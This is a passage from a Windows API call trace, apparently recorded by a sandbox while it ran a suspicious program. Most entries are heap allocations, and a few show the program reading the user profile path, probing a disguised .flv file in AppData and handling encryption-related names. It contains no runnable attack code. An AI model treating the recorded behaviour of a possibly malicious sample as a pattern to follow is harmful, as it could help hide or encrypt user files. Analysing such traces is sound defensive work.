hHeap=0x970000, dwFlags=0x0, lpMem=0x2e504e8 | out: hHeap=0x970000) returned 1 [0222.844] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54bb8 | out: hHeap=0x970000) returned 1 [0222.844] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2f042d8 | out: hHeap=0x970000) returned 1 [0222.844] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54c08 | out: hHeap=0x970000) returned 1 [0222.844] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e53818 | out: hHeap=0x970000) returned 1 [0222.844] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e53770 [0222.844] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50470 | out: hHeap=0x970000) returned 1 [0222.844] PeekMessageW (in: lpMsg=0x8cf968, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf968) returned 0 [0222.845] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x30) returned 0x2f04508 [0222.845] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54bb8 [0222.845] CharUpperBuffW (in: lpsz="_CRYPT_ENCRYPTFILE", cchLength=0x12 | out: lpsz="_CRYPT_ENCRYPTFILE") returned 0x12 [0222.845] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2f04508 | out: hHeap=0x970000) returned 1 [0222.845] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54bb8 | out: hHeap=0x970000) returned 1 [0222.845] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50620 [0222.845] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x1) returned 0x2e54c78 [0222.845] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50638 [0222.845] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e506b0 [0222.845] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54cc8 [0222.845] GetEnvironmentVariableW (in: lpName="USERPROFILE", lpBuffer=0x8cf4d0, nSize=0x104 | out: lpBuffer="C:\\Users\\FD1HVy") returned 0xf [0222.845] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50440 [0222.845] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e79310 [0222.845] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54bb8 [0222.845] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54c88 [0222.845] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x18) returned 0x2e69988 [0222.845] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50668 [0222.845] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x90) returned 0x2e58910 [0222.845] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e79310 | out: hHeap=0x970000) returned 1 [0222.845] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50668 | out: hHeap=0x970000) returned 1 [0222.845] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54cd8 [0222.845] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54cd8 | out: hHeap=0x970000) returned 1 [0222.845] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50428 [0222.846] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50428 | out: hHeap=0x970000) returned 1 [0222.846] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e69988 | out: hHeap=0x970000) returned 1 [0222.846] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54c88 | out: hHeap=0x970000) returned 1 [0222.846] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54cc8 | out: hHeap=0x970000) returned 1 [0222.846] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x1) returned 0x2e54c88 [0222.846] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50428 [0222.846] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54c18 [0222.846] GetEnvironmentVariableW (in: lpName="USERPROFILE", lpBuffer=0x8cf4d0, nSize=0x104 | out: lpBuffer="C:\\Users\\FD1HVy") returned 0xf [0222.846] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50668 [0222.846] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e79310 [0222.846] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54c98 [0222.846] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54bc8 [0222.846] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x18) returned 0x2e699e8 [0222.846] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50698 [0222.846] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xa0) returned 0x3be0dd0 [0222.846] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e79310 | out: hHeap=0x970000) returned 1 [0222.846] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50698 | out: hHeap=0x970000) returned 1 [0222.846] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50470 [0222.846] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50470 | out: hHeap=0x970000) returned 1 [0222.846] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e699e8 | out: hHeap=0x970000) returned 1 [0222.846] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54bc8 | out: hHeap=0x970000) returned 1 [0222.846] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54c18 | out: hHeap=0x970000) returned 1 [0222.846] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x1) returned 0x2e54b28 [0222.846] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50698 [0222.846] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54c08 [0222.846] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50560 [0222.846] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54c08 | out: hHeap=0x970000) returned 1 [0222.847] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x1) returned 0x2e54b98 [0222.847] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50458 [0222.847] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54bc8 [0222.847] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54bc8 | out: hHeap=0x970000) returned 1 [0222.847] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e503e0 [0222.847] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e79310 [0222.847] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e505f0 [0222.847] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54ce8 [0222.847] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e505f0 | out: hHeap=0x970000) returned 1 [0222.847] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e79338 [0222.847] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50470 [0222.847] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50548 [0222.847] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e7f3f0 [0222.847] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50488 [0222.847] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54ca8 [0222.847] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50488 | out: hHeap=0x970000) returned 1 [0222.847] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x30) returned 0x2f043f0 [0222.847] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e503c8 [0222.847] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50578 [0222.847] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e7f788 [0222.847] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e505d8 [0222.847] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54cb8 [0222.847] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e505d8 | out: hHeap=0x970000) returned 1 [0222.847] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e7f5a8 [0222.847] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50590 [0222.847] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e504e8 [0222.847] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e7f490 [0222.848] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50488 [0222.848] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54c08 [0222.848] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e505d8 [0222.848] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x40) returned 0x2e78a50 [0222.848] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0222.848] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50500 [0222.848] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54cf8 [0222.848] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e505f0 [0222.848] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50de8 [0222.848] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54b48 [0222.848] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e7f698 [0222.848] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50f50 [0222.848] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54c18 [0222.848] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50d70 [0222.848] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50ef0 [0222.848] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50500 | out: hHeap=0x970000) returned 1 [0222.848] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e7f4b8 [0222.848] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e505f0 | out: hHeap=0x970000) returned 1 [0222.848] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50500 [0222.848] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e505f0 [0222.848] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54bc8 [0222.848] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e7f418 [0222.848] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50e60 [0222.848] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54cc8 [0222.848] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50e60 | out: hHeap=0x970000) returned 1 [0222.848] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e7f670 [0222.849] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50ce0 [0222.849] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50da0 [0222.849] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e7f4b8 | out: hHeap=0x970000) returned 1 [0222.849] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54cf8 | out: hHeap=0x970000) returned 1 [0222.849] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50500 | out: hHeap=0x970000) returned 1 [0222.849] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0222.849] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50500 [0222.849] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54cf8 [0222.849] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50f68 [0222.849] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50f80 [0222.849] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54b58 [0222.849] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e7f6c0 [0222.849] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50d88 [0222.849] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54cd8 [0222.849] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50cf8 [0222.849] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50f08 [0222.849] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54ef8 [0222.849] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50f68 | out: hHeap=0x970000) returned 1 [0222.849] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ef8 | out: hHeap=0x970000) returned 1 [0222.849] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50f80 | out: hHeap=0x970000) returned 1 [0222.849] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54b58 | out: hHeap=0x970000) returned 1 [0222.849] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50f08 | out: hHeap=0x970000) returned 1 [0222.849] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50f80 [0222.849] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50e30 [0222.849] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54b58 [0222.849] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e7f4b8 [0222.850] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50db8 [0222.850] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54d78 [0222.850] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50d10 [0222.850] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50d28 [0222.850] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54db8 [0222.850] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50f80 | out: hHeap=0x970000) returned 1 [0222.850] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54db8 | out: hHeap=0x970000) returned 1 [0222.850] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50e30 | out: hHeap=0x970000) returned 1 [0222.850] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54b58 | out: hHeap=0x970000) returned 1 [0222.850] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50d28 | out: hHeap=0x970000) returned 1 [0222.850] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50500 | out: hHeap=0x970000) returned 1 [0222.850] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54cf8 | out: hHeap=0x970000) returned 1 [0222.850] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0222.850] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50500 [0222.850] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54cf8 [0222.850] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50500 | out: hHeap=0x970000) returned 1 [0222.850] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e7f5f8 [0222.850] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50500 [0222.850] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50fb0 [0222.850] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54b58 [0222.850] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e7f350 [0222.850] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50f68 [0222.850] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54db8 [0222.850] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50f68 | out: hHeap=0x970000) returned 1 [0222.850] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e7f620 [0222.850] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50cc8 [0222.851] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50ec0 [0222.851] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e7f5f8 | out: hHeap=0x970000) returned 1 [0222.851] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54cf8 | out: hHeap=0x970000) returned 1 [0222.851] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50500 | out: hHeap=0x970000) returned 1 [0222.851] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0222.851] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50500 [0222.851] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54cf8 [0222.851] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50500 | out: hHeap=0x970000) returned 1 [0222.851] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e7f7b0 [0222.851] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50500 [0222.851] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50e18 [0222.851] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54ef8 [0222.851] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e7f3a0 [0222.851] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50d28 [0222.851] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54dc8 [0222.851] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50d28 | out: hHeap=0x970000) returned 1 [0222.851] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e7f648 [0222.851] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50e78 [0222.851] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50d28 [0222.851] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54f08 [0222.851] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50500 | out: hHeap=0x970000) returned 1 [0222.851] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50500 [0222.851] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50e60 [0222.851] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54d18 [0222.851] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50d40 [0222.852] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d18 | out: hHeap=0x970000) returned 1 [0222.852] FindFirstFileW (in: lpFileName="C:\\Users\\FD1HVy/AppData/Roaming/af0Z-.flv", lpFindFileData=0x8cf170 | out: lpFindFileData=0x8cf170*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xbf757460, ftCreationTime.dwHighDateTime=0x1d5ea1b, ftLastAccessTime.dwLowDateTime=0x8c4b4d70, ftLastAccessTime.dwHighDateTime=0x1d5e21a, ftLastWriteTime.dwLowDateTime=0x8c4b4d70, ftLastWriteTime.dwHighDateTime=0x1d5e21a, nFileSizeHigh=0x0, nFileSizeLow=0x166f1, dwReserved0=0x0, dwReserved1=0x8cf1b8, cFileName="af0Z-.flv", cAlternateFileName="")) returned 0xa86f90 [0222.852] FindClose (in: hFindFile=0xa86f90 | out: hFindFile=0xa86f90) returned 1 [0222.852] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50d40 | out: hHeap=0x970000) returned 1 [0222.852] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50e60 | out: hHeap=0x970000) returned 1 [0222.852] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50500 | out: hHeap=0x970000) returned 1 [0222.852] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f08 | out: hHeap=0x970000) returned 1 [0222.852] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50e18 | out: hHeap=0x970000) returned 1 [0222.852] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ef8 | out: hHeap=0x970000) returned 1 [0222.852] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50d28 | out: hHeap=0x970000) returned 1 [0222.852] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e7f7b0 | out: hHeap=0x970000) returned 1 [0222.852] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54cf8 | out: hHeap=0x970000) returned 1 [0222.853] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0222.853] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50f80 [0222.853] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54cf8 [0222.853] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50f08 [0222.853] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50ed8 [0222.853] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54ef8 [0222.853] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e7f7b0 [0222.853] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50dd0 [0222.853] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54f08 [0222.853] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50e90 [0222.853] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50ea8 [0222.853] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54d18 [0222.853] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50f08 | out: hHeap=0x970000) returned 1 [0222.853] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d18 | out: hHeap=0x970000) returned 1 [0222.853] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50ed8 | out: hHeap=0x970000) returned 1 [0222.853] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ef8 | out: hHeap=0x970000) returned 1 [0222.853] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50ea8 | out: hHeap=0x970000) returned 1 [0222.853] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50f80 | out: hHeap=0x970000) returned 1 [0222.853] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54cf8 | out: hHeap=0x970000) returned 1 [0222.853] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0222.853] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e7f580 [0222.853] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54cf8 [0222.853] CharUpperBuffW (in: lpsz="_CRYPT_STARTUP", cchLength=0xe | out: lpsz="_CRYPT_STARTUP") returned 0xe [0222.853] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e7f580 | out: hHeap=0x970000) returned 1 [0222.853] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54cf8 | out: hHeap=0x970000) returned 1 [0222.853] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e50f08 [0222.853] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x40) returned 0x2e78618 [0222.854] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0222.854] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54cf8 [0222.854] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x30) returned 0x2f04460 [0222.854] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54ef8 [0222.854] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNT", cchLength=0x10 | out: lpsz="__CRYPT_REFCOUNT") returned 0x10 [0222.854] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2f04460 | out: hHeap=0x970000) returned 1 [0222.854] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ef8 | out: hHeap=0x970000) returned 1 [0222.854] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e50f68 [0222.854] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x40) returned 0x2e78b28 [0222.854] PeekMessageW (in: lpMsg=0x8cf0a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf0a8) returned 0 [0222.854] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54ef8 [0222.854] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54d18 [0222.854] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d18 | out: hHeap=0x970000) returned 1 [0222.854] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ef8 | out: hHeap=0x970000) returned 1 [0222.854] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e78b28 | out: hHeap=0x970000) returned 1 [0222.854] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50f68 | out: hHeap=0x970000) returned 1 [0222.854] 